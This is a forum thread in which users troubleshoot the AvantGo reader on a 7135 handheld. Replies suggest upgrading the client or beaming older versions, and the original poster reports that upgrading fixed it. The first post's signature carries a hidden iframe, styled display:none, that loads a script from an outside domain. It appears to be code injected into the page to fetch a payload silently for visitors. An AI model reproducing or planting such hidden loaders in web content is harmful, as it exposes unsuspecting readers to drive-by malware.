+ Reply to Thread

avantgo version that works?

My old Avantgo on the 6035 worked...but the same software no longer works on the 7135. I haven't found anything on the board from a search.

Anyone have ideas of how to get Avantgo to work on the 7135?

--Richard<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Have you tried going to the AdvantGo site and downloading their newest client? (https://my.avantgo.com/account/downloads.html)

After my 6035 took a dump and did a hard reset, I found I was out of date on quite a few of my Palm apps. So I went to each app site and got the latest version.

Since I don't have a 7135 (yet), I can't verify that it will work, but maybe doing a hard reset and re-installing everything might work? Or maybe a hack could be interfering with AvantGo that worked on the 6035?

Just some ideas...
    ~Ron

Administrator
    the latest version works on the i330 so i dont see why it would not work on the 7135...

I have it on my 7135 It works fine.
    4.2 build 1165 If that helps
    No Honey it didn't cost that much really it didn't

Got it working! Thanks much!

My version is even older -- 3.3 build 403. I've been using it for over 2 years with no problems. All I did was beam 3 applications from my Visor Edge to my 7135 -- Avantgo, Mobile Link, libmal. I did it by trial-and-error. Afterwards, I manually copied over the server preferences settings from Edge to 7135. And it worked. I even got modem sync to work using qnc. So, no need to sync using the cradle. Takes about 3-4 minutes to do a wireless sync for all my channels. Great for reading ny times on sunday mornings.

Originally posted by richard
    Got it working! Thanks much!
    Out of curiousity, and for the benefit of others , what fixed the problem?

Yes, great point. Just upgraded the version to the latest. There is an OS5 beta but of course I didn't use that. My hesitation was really that I wanted to see if others had got it working before I tried that.

Thanks!